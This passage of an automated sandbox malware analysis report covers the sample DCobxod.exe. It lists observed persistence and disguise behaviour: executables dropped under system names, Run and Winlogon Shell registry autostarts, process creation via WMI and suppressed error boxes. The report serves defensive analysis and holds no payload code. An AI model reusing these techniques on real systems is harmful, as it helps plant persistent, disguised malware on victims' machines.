                                    Source: DCobxod.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: DCobxod.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: DCobxod.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: DCobxod.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.cmdline"
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\smysgui2\smysgui2.cmdline"
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\y4s1cmk0\y4s1cmk0.cmdline"Jump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\smysgui2\smysgui2.cmdline"Jump to behavior
                                    Source: C:\Users\user\Desktop\DCobxod.exeFile created: C:\Browserhost\__tmp_rar_sfx_access_check_7127875Jump to behavior
                                    Source: DCobxod.exeStatic PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0042F640 push ecx; ret 0_2_0042F653
                                    Source: C:\Users\user\Desktop\DCobxod.exeCode function: 0_2_0042EB78 push eax; ret 0_2_0042EB96
                                    Source: C:\Browserhost\intoHostperf.exeCode function: 5_2_00007FF848D900BD pushad ; iretd 5_2_00007FF848D900C1

                                    Persistence and Installation Behavior

                                    barindex
                                    Creates processes via WMI
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Browserhost\intoHostperf.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Drops PE files with benign system names
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeJump to dropped file
                                    Infects executable files (exe, dll, sys, html)
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\HhGhtKRk.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\ProgramData\SoftwareDistribution\winlogon.exeJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\jcBCwIrh.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Recovery\upfc.exeJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\QuHEOinP.logJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\GTYGJoJn.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\TkyvVenI.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\WuUwVxTJ.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\zmrZuvIB.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\Default\Saved Games\LaSqLWtOcizKrlm.exeJump to dropped file
                                    Source: C:\Users\user\Desktop\DCobxod.exeFile created: C:\Browserhost\intoHostperf.exeJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\pEXJLSDT.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\bnxVycYy.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Browserhost\LaSqLWtOcizKrlm.exeJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\urpInPSH.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\NzFoXiJZ.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\wtcqJyWC.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\kIWsDnNZ.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\DaJYXsXp.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\xpPRZvtG.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\QQZxdmXS.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Network Shortcuts\explorer.exeJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\AkShQvXv.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\CdhQCsIu.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\nBlbpjyY.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\ZuimMgmz.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\TBFNkAhL.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\XrvErxiE.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\ProgramData\SoftwareDistribution\winlogon.exeJump to dropped file
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\TkyvVenI.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\CdhQCsIu.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\bnxVycYy.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\QuHEOinP.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\zmrZuvIB.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\pEXJLSDT.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\XrvErxiE.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\DaJYXsXp.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\urpInPSH.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\kIWsDnNZ.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\NzFoXiJZ.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\GTYGJoJn.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\xpPRZvtG.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\nBlbpjyY.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\WuUwVxTJ.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\TBFNkAhL.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\AkShQvXv.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\jcBCwIrh.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\ZuimMgmz.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\QQZxdmXS.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\HhGhtKRk.logJump to dropped file
                                    Source: C:\Browserhost\intoHostperf.exeFile created: C:\Users\user\Desktop\wtcqJyWC.logJump to dropped file

                                    Boot Survival

                                    barindex
                                    Creates an undocumented autostart registry key
                                    Source: C:\Browserhost\intoHostperf.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                    Creates multiple autostart registry keys
                                    Source: C:\Browserhost\intoHostperf.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run intoHostperfJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run upfcJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogonJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorerJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LaSqLWtOcizKrlmJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run upfcJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run upfcJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run upfcJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run upfcJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LaSqLWtOcizKrlmJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LaSqLWtOcizKrlmJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogonJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run winlogonJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorerJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorerJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run intoHostperfJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run intoHostperfJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run intoHostperfJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run intoHostperfJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LaSqLWtOcizKrlmJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LaSqLWtOcizKrlmJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LaSqLWtOcizKrlmJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LaSqLWtOcizKrlmJump to behavior

                                    Hooking and other Techniques for Hiding and Protection

                                    barindex
                                    Loading BitLocker PowerShell Module
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Users\user\Desktop\DCobxod.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Browserhost\intoHostperf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
